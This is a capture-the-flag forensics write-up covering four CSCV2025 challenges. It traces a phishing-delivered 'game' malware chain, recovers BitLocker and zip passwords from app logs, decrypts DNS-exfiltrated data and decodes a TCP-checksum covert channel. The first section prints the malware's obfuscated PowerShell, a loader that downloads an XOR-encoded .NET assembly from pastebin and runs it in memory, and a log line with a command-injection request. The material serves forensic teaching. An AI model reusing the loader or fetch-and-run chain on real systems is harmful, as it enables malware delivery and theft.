NostalgiaS
- We are given an
.ad1image. - Mount it, navigate into
Users/kadoya/AppData/Local/Microsoft/Outlook/, we can read the emails that were sent to Mr. Kadoya. - Inside one of them reads:
PLAINTEXT
Hi player,
I’m sharing something special with you today — a piece of childhood we all loved: the game Moly.
Moly tells the touching story of a red-nosed mole and its friend Dau Dau. Together, they escape a burning forest and rebuild their lives in a peaceful snowy land — growing crops, raising animals, and building a new home filled with warmth and friendship.
For many of us, Moly wasn’t just a game. It was a memory — quiet evenings, simple adventures, and that gentle happiness only old games can bring.
You can find the game file attached. Password: playmoly2025.
Run game by click "playmoly".
I hope you’ll take a moment to revisit this little world — and relive the feeling of those days again.
Enjoy your journey,
ACE
Team Moly- Which tells us that Mr.Kadoya ran a hidden malware inside
playmoly. - By extracting the archive from the mailbox, we unzip the file with the password:
playmoly2025 - Inside the file is a script that contains a peculiar line:
JAVASCRIPT
var remoteHtaUrl = 'https://gist.githubusercontent.com/oumazio/ad5626973af6118062ae401c1e788464/raw/725302cda73d10e260e2ed0f26d935e576d3bc1c/FlashInstaller.hta';- By accessing the link, we are met with yet another file, this time containing the so-called “game code”. Upon further inspection, the file connects to another Github GIST
JAVASCRIPT
var logo = "https://gist.githubusercontent.com/oumazio/d2b2cbbe1ad51fd956815e78e6bfe31d/raw/2e34af3f8aac3392f07a1d59013cc8897dda8f3a/something.txt";- Accessing the link hands us yet another script, this time heavily obfuscated. Upon even further inspection, the script downloads another script.
BASH
$ grep 'https' something.txt
https://gist.githubusercontent.com/oumazio/fdd0b2711ab501b30b53039fa32bc9ca/raw/ca4f9da41c5c64b3b43f4b0416f8ee0d0e400803/secr3t.txt- Inside is yet another obfuscated script.
POWERSH
Iex(neW-obJecT iO.cOMPrESsion.DeflaTEStreAM([iO.meMORysTrEAM] [convErt]::FroMbase64sTrInG('hVNhb9owEP2OxH+wUCSCIIZO06Qy7QNt1a1rxyZg6ybEJic5iFfHzhxTiLr+953BlKSgNV+i3N17797lzhvkOaShKL5qQd6RRmJMlve73YzlBkIuaaTSrmar7mnvD/wYfxg06jXvu9LXUGB5b/3qNX5PigyGLAVLMDbABOiPTDKOYA10xGPQ1zy6s9BPYBIV74pHS4nBes3ogjzUawQf7xbCc8FBGiwYwir4HP6GyJBxgQ2ldAiGPlU4BMhIxRCfK2m2sD0HvVArKRSLx0ZzufC9kt3Wc0F6wfNM5eC7jMsnsP7GxBJyy1zVohPNU79FgjwT3JBmp0n+ktsENOzafiDeLxKkzEQJaf7srae94HQQXLJgPmt7TfJYUXLkZ4XZiJXchxiazkq90BuQC5NsgXOlie9x+0PeEnwHwhyW2ky73drN+UBw6vEZMkzR2j1oM+v3J8om/D2TLXGWO+TkjRtT1YPSfMElE/8xUVZ92ceR6mNWKrrOy6G/IFyjhlvgY+0ztx92Em7lRjAX2D5Xku62B4dzg0vlV1Ura8PnaOXpMAIJpNEgAZMxKd/ANl51YphegLFQa2HXEH2/je1JWyVMuqG8knNlMXsGi9rK+SXZzjFvZ1zGeCKXgi1y9Dc2zPAIB4bzern6yzIUPDreEb2S9+oOG5dLITpk83q+Oo8k2pyImwOs8ZpOMPwP' ) ,[SYSTeM.io.comPRESsion.COmPRessiONmODe]::DECompResS) |FOReach-oBJeCt{ neW-obJecT SyStEM.Io.STreAmREaDeR( $_,[TEXT.EncOdiNG]::ascIi ) }| FOreacH-objeCT{$_.rEAdToeND( ) }) - The script is compressed with
zliband encoded with base64, we can decrypt it with:
PYTHON
$ sh -c -- "python3 - << 'PY'
import base64, zlib, pathlib, sys
b64 = pathlib.Path('script.txt').read_text().strip()
data = base64.b64decode(b64)
text = zlib.decompress(data, -zlib.MAX_WBITS).decode('ascii', errors='replace')
pathlib.Path('decoded.txt').write_text(text)
PY"- The decoded file reads:
JAVA
$AssemblyUrl = "https://pastebin.com/raw/90qeYSHA"
$XorKey = 0x24
$TypeName = "StealerJanai.core.RiderKick"
$MethodName = "Run"
try {
$WebClient = New-Object System.Net.WebClient
$encodedContent = $WebClient.DownloadString($AssemblyUrl)
$WebClient.Dispose()
$hexValues = $encodedContent.Trim() -split ',' | Where-Object { $_ -match '^0x[0-9A-Fa-f]+$' }
$encodedBytes = New-Object byte[] $hexValues.Length
for ($i = 0; $i -lt $hexValues.Length; $i++) {
$encodedBytes[$i] = [Convert]::ToByte($hexValues[$i].Trim(), 16)
}
$originalBytes = New-Object byte[] $encodedBytes.Length
for ($i = 0; $i -lt $encodedBytes.Length; $i++) {
$originalBytes[$i] = $encodedBytes[$i] -bxor $XorKey
}
$assembly = [System.Reflection.Assembly]::Load($originalBytes)
if ($TypeName -ne "" -and $MethodName -ne "") {
$targetType = $assembly.GetType($TypeName)
$methodInfo = $targetType.GetMethod($MethodName, [System.Reflection.BindingFlags]::Static -bor [System.Reflection.BindingFlags]::Public)
$methodInfo.Invoke($null, $null)
}
} catch {
exit 1
} - We are met with yet another script downloader, this time the script is obfuscated with XOR.
JAVA
$AssemblyUrl = "https://pastebin.com/raw/90qeYSHA"
$XorKey = 0x24- After decoding, the script gives us a .NET binary, which we have to reverse engineer. The script seems to be an information collect, which have a component named
StealerJanai.component.systeminfo.SystemSecretInformationCollector.cs, which reads:
CSHARP
// StealerJanai, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// StealerJanai.component.systeminfo.SystemSecretInformationCollector
using System;
using System.Collections.Generic;
using System.Text;
using Microsoft.Win32;
public class SystemSecretInformationCollector
{
private const string MagicChars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
public string Collect()
{
StringBuilder stringBuilder = new StringBuilder();
try
{
string text = DecodeMagicToString("AuEcc3iNuamB9JOyfS1pel55JqxgJ83");
string machineName = Environment.MachineName;
string text2 = DecodeMagicToString("sA0m1sPHdceUL6HSvGAbFuhN");
string registryValue = GetRegistryValue();
string value = text + machineName + "_" + text2 + registryValue + "}";
stringBuilder.Append(value);
}
catch (Exception ex)
{
stringBuilder.AppendLine($"Error: {ex.Message}");
}
return stringBuilder.ToString();
}
private string DecodeMagicToString(string input)
{
try
{
if (string.IsNullOrEmpty(input))
{
return string.Empty;
}
List<byte> list = new List<byte>();
foreach (char value in input)
{
int num = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".IndexOf(value);
if (num < 0)
{
return "Invalid character";
}
int num2 = num;
for (int num3 = list.Count - 1; num3 >= 0; num3--)
{
int num4 = list[num3] * 62 + num2;
list[num3] = (byte)(num4 % 256);
num2 = num4 / 256;
}
while (num2 > 0)
{
list.Insert(0, (byte)(num2 % 256));
num2 /= 256;
}
}
int j;
for (j = 0; j < list.Count && list[j] == 0; j++)
{
}
if (j >= list.Count)
{
return string.Empty;
}
byte[] array = new byte[list.Count - j];
for (int k = 0; k < array.Length; k++)
{
array[k] = list[j + k];
}
return Encoding.ASCII.GetString(array);
}
catch (Exception ex)
{
return "Decode error: " + ex.Message;
}
}
private string GetRegistryValue()
{
try
{
using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\hensh1n"))
{
if (registryKey != null)
{
object value = registryKey.GetValue("");
if (value != null)
{
return value.ToString();
}
}
}
return "Registry key not found";
}
catch (Exception ex)
{
return "Registry error: " + ex.Message;
}
}
}- From this clue:
CSHARP
string text = DecodeMagicToString("AuEcc3iNuamB9JOyfS1pel55JqxgJ83");
string machineName = Environment.MachineName;
string text2 = DecodeMagicToString("sA0m1sPHdceUL6HSvGAbFuhN");
string registryValue = GetRegistryValue();
string value = text + machineName + "_" + text2 + registryValue + "}";- The flag format seems to be
<text1_decoded>_<machineName>_<text2_decoded><registryValue>} - Decoding the text with script gives us:
text1:CSCV2025{your_computer_text2:has_be3n_kicked_by
- Which gives us:
CSCV2025{your_computer_<machineName>_has_be3n_kicked_by<registryValue>} - To find the machine name, we can read the logs.
BASH
$ evtx_dump 'Windows/System32/winevt/Logs/Application.evtx' | grep '<Computer>'
<Computer>DESKTOP-47ICHL6</Computer>- Which gives us:
DESKTOP-47ICHL6 - Finally, we need to get the registry value.
CSHARP
using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\hensh1n"))- The registry is under
SOFTWARE\\hensh1n, which we can read withhivex
BASH
$ hivexget 'Users/kadoyat/NTUSER.DAT' 'SOFTWARE\\hensh1n'
"@"="HxrYJgdu"- Which gives us
HxrYJgdu, combining all of them gives us the flag.
Flag: CSCV2025{your_computer_DESKTOP-47ICHL6_has_be3n_kicked_byHxrYJgdu}
Case AlphaS
- We are given an
.ad1image and a Bitlocker drive.
PLAINTEXT
.
├── evidences.ad1
├── evidences.ad1.txt
├── external.vhdx
└── ReadMe.pdf- Going to
Windows/Prefetch, this is where windows keep cache of ran applications, we can see the suspect has ran apps likeChatGPTandSimpeNotesfrom the prefetch files:CHATGPT.EXE-0140405B.pfSIMPLENOTE.EXE-0ED0EC4F.pf
- These apps usually store logs on the devices inside
AppData. - We then find traces of a Bitlocker password inside
Users/windows/AppData.
BASH
$ find ./AppData/Local/Packages/OpenAI.ChatGPT-Desktop_2p2nqsd0c76g0-type f -exec grep -Hnl 'bitlocker' {} \;
./AppData/Local/Packages/OpenAI.ChatGPT-Desktop_2p2nqsd0c76g0/LocalCache/Roaming/ChatGPT/Local Storage/leveldb/000003.log- The Bitlocker key is stored inside
000003.log, which we can extract.
BASH
$ strings './AppData/Local/Packages/OpenAI.ChatGPT-Desktop_2p2nqsd0c76g0/LocalCache/Roaming/ChatGPT/Local Storage/leveldb/000003.log' | grep 'bitlocker'
{"drafts":[{"id":"null_thread","content":"I've locked my drive with this bitlocker key 028853-431640-166364-032076-217943-045837-542388-281017","timestamp":1759586173510}],"userId":"user-2smrET6gmFXbt2Kc8fCX9h2y"}
{"drafts":[{"id":"null_thread","content":"I've locked my drive with this bitlocker key 028853-431640-166364-032076-217943-045837-542388-281017 and put the key in my usb","timestamp":1759586182351}],"userId":"user-2smrET6gmFXbt2Kc8fCX9h2y"}
{"drafts":[{"id":"null_thread","content":"I've locked my drive with this bitlocker key 028853-431640-166364-032076-217943-045837-542388-281017 and put the key in my usb. If I lost my usb, ","timestamp":1759586191824}],"userId":"user-2smrET6gmFXbt2Kc8fCX9h2y"}- The Bitlocker key is
028853-431640-166364-032076-217943-045837-542388-281017 - Using this key, we are able to get the file
secret.zipout of the drive. Unfortunately, this zip file is also locked with a password. - From our previous clues, the suspect also installed
SimpleNotes, which could also be where they stored the zip password.
BASH
$ find ./AppData/Local/Packages/22490Automattic.Simplenote_9h07f78gwnchp/ -type f -exec grep -Hnl 'zip password' {} \;
./AppData/Local/Packages/22490Automattic.Simplenote_9h07f78gwnchp/LocalCache/Roaming/Simplenote/IndexedDB/file__0.indexeddb.leveldb/000003.log
$ strings './AppData/Local/Packages/22490Automattic.Simplenote_9h07f78gwnchp/LocalCache/Roaming/Simplenote/IndexedDB/file__0.indexeddb.leveldb/000003.log'
...
content"Ozip password:
5525b8d2d8534b716467493f3660b11e1c44b22cd0c97275619b94a0e5c82fda"
...- The zip password is
5525b8d2d8534b716467493f3660b11e1c44b22cd0c97275619b94a0e5c82fda - Extracting it gives us
ssh.txt, which reads:
PLAINTEXT
# access via vpn or proxy if you are blocked
https://pastebin.com/WciYiDEs
cff4c6f0b68c31cb- Inside the pastebin:
YAML
backup-server - 192.168.10.25
- username: admin
- password: F@keP@ss2025!
- service: MySQL
web-frontend - 192.168.10.50
- username: deploy
- password: W3bP@ss!8192
- service: Apache
log-collector - 192.168.10.77
- username: syslog
- password: L0gs2025#@@
- service: Graylog
dev-test - 192.168.12.23
- username: flag
- password: h3Y_Th!s_|5_jUs7_tH3_bE9IN|\|iNg_dc8fb5bdedd10877
- service: CSCV2025Note
If you can’t access Pastebin with a Proxy/VPN, use this frontend instead: https://pasted.drakeerv.com/WciYiDEs
Flag: CSCV2025{h3Y_Th!s_|5_jUs7_tH3_bE9IN|\|iNg_dc8fb5bdedd10877}
DNS Exfil
- We are given three files:
PLAINTEXT
.
├── 10.10.0.53_ns_capture.pcap
├── 10.10.5.80_access.log
└── 10.10.5.80_error.log- From the title, we know the perpetrator exiltrated the data with the DNS protocol.
BASH
$ tshark -r 10.10.0.53_ns_capture.pcap | grep hex | awk '{print $13}' | tr -d 'A'
p.c7aec5d0d81ba8748acac6931e5add6c24b635181443d0b9d2.hex.cloudflar3.com
p.f8aad90d5fc7774c1e7ee451e755831cd02bfaac3204aed8a4.hex.cloudflar3.com
p.3dfec8a22cde4db4463db2c35742062a415441f526daecb59b.hex.cloudflar3.com
p.f6af1ecb8cc9827a259401e850e5e07fdc3c1137f1.hex.cloudflar3.com
f.6837abc6655c12c454abe0ca85a596e98473172829581235dd.hex.cloudflar3.com
f.95380b06bf6dd06b89118b0003ea044700a5f2c4c106c3.hex.cloudflar3.com- We save the hexdumps into seperate files.
SH
$ cat 'p.dump'
c7aec5d0d81ba8748acac6931e5add6c24b635181443d0b9d2f8aad90d5fc7774c1e7ee451e755831cd02bfaac3204aed8a43dfec8a22cde4db4463db2c35742062a415441f526daecb59bf6af1ecb8cc9827a259401e850e5e07fdc3c1137f1
$ cat 'f.dump'
6837abc6655c12c454abe0ca85a596e98473172829581235dd95380b06bf6dd06b89118b0003ea044700a5f2c4c106c3- Decoding the hexdumps gives us garbage data, maybe it’s encrypted.
- We then check out the other files
BASH
$ grep 'flag' 10.10.5.80_access.log
192.168.13.37 - - [10/Oct/2025:09:21:10 +0700] "GET /media/image1.php?c=cat%20/flag HTTP/1.1" 403 284 "-" "curl/7.88.1"- Someone tried to access the flag around
09:21:20, we now check the approximate timestamp in the other file.
BASH
$ grep '09:2.:..' 10.10.5.80_error.log
...
2025/10/10 09:26:03 [error] 1224#0: *5210 FastCGI sent in stderr: "PHP Notice: DEBUG VARS: APP_SECRET=F0r3ns1c-2025-CSCV; DATE_UTC=20251010" while reading response header from upstream, client: 192.168.13.37, server: portal.local, request: "GET /media/getfile.php?debug=true HTTP/1.1", upstream: "fastcgi://unix:/run/php/php8.2-fpm.sock:", host: "intra.portal.local"
2025/10/10 09:26:03 [error] 1224#0: *5210 FastCGI sent in stderr: "PHP Notice: H=SHA256(APP_SECRET); AES_KEY=H[0..15]; AES_IV=H[16..31]" while reading response header from upstream, client: 192.168.13.37, server: portal.local, request: "GET /media/getfile.php?debug=true HTTP/1.1", upstream: "fastcgi://unix:/run/php/php8.2-fpm.sock:", host: "intra.portal.local"
...- From here we are able to find the AES Key
BASH
$ echo 'F0r3ns1c-2025-CSCV' | sha256sum
f17f8c9fbb0f68bf1fab0124c5bef912bd5c0c7e6750b1dd1ab0f8ea1fdd639b -- Which gives us:
- Key:
5769179ccdf950443501d9978f52ddb5 - IV:
1b70ca0d4f607a976c6639914af7c7a6
- Key:
- Decrypting
f.dumpgives us the flag.
BASH
$ xxd -r -p 'f.dump' | openssl enc -aes-128-cbc -d -K 5769179ccdf950443501d9978f52ddb5 -iv 1b70ca0d4f607a976c6639914af7c7a6
CSCV2025{DnS_Exf1ltr4ti0nnnnnnnnnnNN!!}Flag: CSCV2025{DnS_Exf1ltr4ti0nnnnnnnnnnNN!!}
CovertS
- We are given a
.pcapfile, from the challenge we know that the attacker has exfiltrated our data using some sort of covert channel. - Opening up the Conversation tab, we can find the following results:
- A lot of data was sent towards
192.168.192.1with no response. - We can filter the traffic with:
ip.dst == 192.168.192.1
- What the? All of the checksums are wrong!
Note
To validate checksums: Right Click -> Protocol Preferences -> Transmission Control Protocol -> Validate the TCP checksum if possible
- The wrong checksums were sent over intentionally to covert the data. We can start extracting them with
tshark.
BASH
$ tshark -r challenge.pcapng -Y 'ip.dst == 192.168.192.1' -T fields -e tcp.checksum | sed 's/0x//g' | tr -d '\n'
53475673624738675a585a6c636e6c76626d5573445170496233636759584a6c49486c766453426b62326c755a7a3867515342325a584a3549486468636d306764325673593239745a5342306279424455304e574d6a41794e53454e4367304b5353647449484a6c595778736553426e6247466b4948527649484e6c5a53423562335567614756795a534268626d51675353426f6233426c49486c76645364795a5342795a57466b6553426d62334967595734675a58686a61585270626d63675a585a6c626e51675957686c595751754946526f61584d675131524749476c7a4947467362434268596d39316443426a61474673624756755a326c755a7942356233567949484e72615778736379776762475668636d3570626d6367626d56334948527961574e72637977675957356b4947396d49474e7664584a7a5a53417449476868646d6c755a79426d6457346759577876626d63676447686c49486468655334675132397563326c6b5a584967644768706379427361585230624755676257567a6332466e5a5342756233516759584d675953426a61474673624756755a3255676158527a5a57786d4c4342696458516763326c74634778354947467a4947313549486468655342765a69427a59586c70626d6367614756736247386764473867595778734947396d49486c7664534268625746366157356e4948427359586c6c636e4d7544516f4e436c526861325567595342746232316c626e51734947646c6443426a6232316d62334a3059574a735a5377675957356b49475675616d39354948526f5a5342796157526c4c694258614756306147567949486c76645364795a53426f5a584a6c4948527649474e766258426c644755675a6d6c6c636d4e6c62486b73494852764947786c59584a7549484e766257563061476c755a7942755a58637349473979494770316333516764473867614746325a534268494764766232516764476c745a5377675353426f6233426c49454e54513159794d4449314948647062477767596d5567595734676457356d62334a6e5a58523059574a735a53426c6548426c636d6c6c626d4e6c49475a7663694235623355674b4735766443423061476c7a49474e6f595778735a57356e5a5377676347787a49475a76636d646c6443423061476c7a49484e6f4b6e5167543139504b51304b44517042626d5167626d39334c4342336158526f623356304947746c5a584270626d6367655739314948646861585270626d63675957353549477876626d646c636934754c67304b44516f6f633239745a5739755a53426859324e705a4756756447467362486b6763325675644342746553426a6147467349485a705953426c625746706243427a6279426f5a584a6c49476c7a49486c7664584967626d563349475a73595763364b51304b4451704455304e574d6a41794e5874746556396a6147467358326476644639735a5746725a575266596d566d62334a6c5833526f5a56396a623235305a584e3058324a7964576866614756795a56397063313935623356795832356c6431396d6247466e583249344f446b78597a526c4d545133597a51314d6d493459324d324e6a51795a6a45774e4441774e4455796651304b445170655831346763334a3549475a7663694230614755676257567a63773d3d⏎- This is a hexdump, which we can read with
xxd.
BASH
$ tshark -r challenge.pcapng -Y 'ip.dst == 192.168.192.1' -T fields -e tcp.checksum | sed 's/0x//g' | tr -d '\n' | xxd -r -p
SGVsbG8gZXZlcnlvbmUsDQpIb3cgYXJlIHlvdSBkb2luZz8gQSB2ZXJ5IHdhcm0gd2VsY29tZSB0byBDU0NWMjAyNSENCg0KSSdtIHJlYWxseSBnbGFkIHRvIHNlZSB5b3UgaGVyZSBhbmQgSSBob3BlIHlvdSdyZSByZWFkeSBmb3IgYW4gZXhjaXRpbmcgZXZlbnQgYWhlYWQuIFRoaXMgQ1RGIGlzIGFsbCBhYm91dCBjaGFsbGVuZ2luZyB5b3VyIHNraWxscywgbGVhcm5pbmcgbmV3IHRyaWNrcywgYW5kIG9mIGNvdXJzZSAtIGhhdmluZyBmdW4gYWxvbmcgdGhlIHdheS4gQ29uc2lkZXIgdGhpcyBsaXR0bGUgbWVzc2FnZSBub3QgYXMgYSBjaGFsbGVuZ2UgaXRzZWxmLCBidXQgc2ltcGx5IGFzIG15IHdheSBvZiBzYXlpbmcgaGVsbG8gdG8gYWxsIG9mIHlvdSBhbWF6aW5nIHBsYXllcnMuDQoNClRha2UgYSBtb21lbnQsIGdldCBjb21mb3J0YWJsZSwgYW5kIGVuam95IHRoZSByaWRlLiBXaGV0aGVyIHlvdSdyZSBoZXJlIHRvIGNvbXBldGUgZmllcmNlbHksIHRvIGxlYXJuIHNvbWV0aGluZyBuZXcsIG9yIGp1c3QgdG8gaGF2ZSBhIGdvb2QgdGltZSwgSSBob3BlIENTQ1YyMDI1IHdpbGwgYmUgYW4gdW5mb3JnZXR0YWJsZSBleHBlcmllbmNlIGZvciB5b3UgKG5vdCB0aGlzIGNoYWxsZW5nZSwgcGxzIGZvcmdldCB0aGlzIHNoKnQgT19PKQ0KDQpBbmQgbm93LCB3aXRob3V0IGtlZXBpbmcgeW91IHdhaXRpbmcgYW55IGxvbmdlci4uLg0KDQooc29tZW9uZSBhY2NpZGVudGFsbHkgc2VudCBteSBjaGFsIHZpYSBlbWFpbCBzbyBoZXJlIGlzIHlvdXIgbmV3IGZsYWc6KQ0KDQpDU0NWMjAyNXtteV9jaGFsX2dvdF9sZWFrZWRfYmVmb3JlX3RoZV9jb250ZXN0X2JydWhfaGVyZV9pc195b3VyX25ld19mbGFnX2I4ODkxYzRlMTQ3YzQ1MmI4Y2M2NjQyZjEwNDAwNDUyfQ0KDQpeX14gc3J5IGZvciB0aGUgbWVzcw==⏎- Which gives us a base64 encoded string, which translates to:
PLAINTEXT
$ tshark -r challenge.pcapng -Y 'ip.dst == 192.168.192.1' -T fields -e tcp.checksum | sed 's/0x//g' | tr -d '\n' | xxd -r -p | base64 -d
Hello everyone,
How are you doing? A very warm welcome to CSCV2025!
I'm really glad to see you here and I hope you're ready for an exciting event ahead. This CTF is all about challenging your skills, learning new tricks, and of course - having fun along the way. Consider this little message not as a challenge itself, but simply as my way of saying hello to all of you amazing players.
Take a moment, get comfortable, and enjoy the ride. Whether you're here to compete fiercely, to learn something new, or just to have a good time, I hope CSCV2025 will be an unforgettable experience for you (not this challenge, pls forget this sh*t O_O)
And now, without keeping you waiting any longer...
(someone accidentally sent my chal via email so here is your new flag:)
CSCV2025{my_chal_got_leaked_before_the_contest_bruh_here_is_your_new_flag_b8891c4e147c452b8cc6642f10400452}
^_^ sry for the mess⏎Flag: CSCV2025{my_chal_got_leaked_before_the_contest_bruh_here_is_your_new_flag_b8891c4e147c452b8cc6642f10400452}
Note
cam on anh s3asick5 vi hint sob sob sob 😭😭😭